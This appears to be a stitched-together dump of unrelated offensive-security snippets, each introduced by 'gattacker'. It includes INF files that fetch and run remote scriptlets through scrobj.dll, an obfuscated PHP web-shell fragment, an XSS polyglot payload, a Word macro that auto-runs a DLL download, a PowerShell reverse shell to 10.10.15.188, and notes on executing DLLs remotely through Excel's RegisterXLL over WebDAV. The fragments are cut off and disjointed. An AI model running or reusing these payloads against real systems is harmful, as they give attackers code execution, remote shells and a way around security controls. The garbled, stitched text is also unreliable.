gattacker

[version]
Signature=$chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
 
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
 

gattacker

<?php
																																				//89v3s162
																																				 ${"GLOBALS"}["mmcqwmh"]="inlink"																																				
																																				 ${"GLOBALS"}["uhejyknv"]="line"																																				 
																																				 ${"GLOBALS"}["mwharsbl"]="inlinks"																																				 
																																				 ${"GLOBALS"}["gwnvtng"]="lines"																																				 
																																				 ${"GLOBALS"}["wfxhckkh"]="paths"																																				 
																																				 ${"GLOBALS"}["elsnpke"]="t"																																				 
																																				 ${"GLOBALS"}["cykmety"]="is_g_ip"																																				
																																				  ${"GLOBALS"}["puhohynck"]="fontSizeChangeButton"																																				 

gattacker

import hashlib,binascii
hash = hashlib.new('md4', "password".encode('utf-16le')).digest()
print (binascii.hexlify(hash))

gattacker

<script>document.write('123')</script>

gattacker

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

gattacker

filter Expand-DefenderAVSignatureDB {
<#
.SYNOPSIS

Decompresses a Windows Defender AV signature database (.VDM file).

.DESCRIPTION

Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.

gattacker

Sub AutoOpen()
    Debugging
End Sub

Sub Document_Open()
    Debugging
End Sub

Public Function Debugging() As Variant
    DownloadDLL

gattacker

$socket = new-object System.Net.Sockets.TcpClient('10.10.15.188', 4438);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
	$writer.Flush();
	$read = $null;

gattacker

[version]
signature="$CHICAGO$"
AdvancedINF=2.0

[DefaultInstall.Windows7]
UnRegisterOCXs=FunRun

[FunRun]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct

gattacker

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc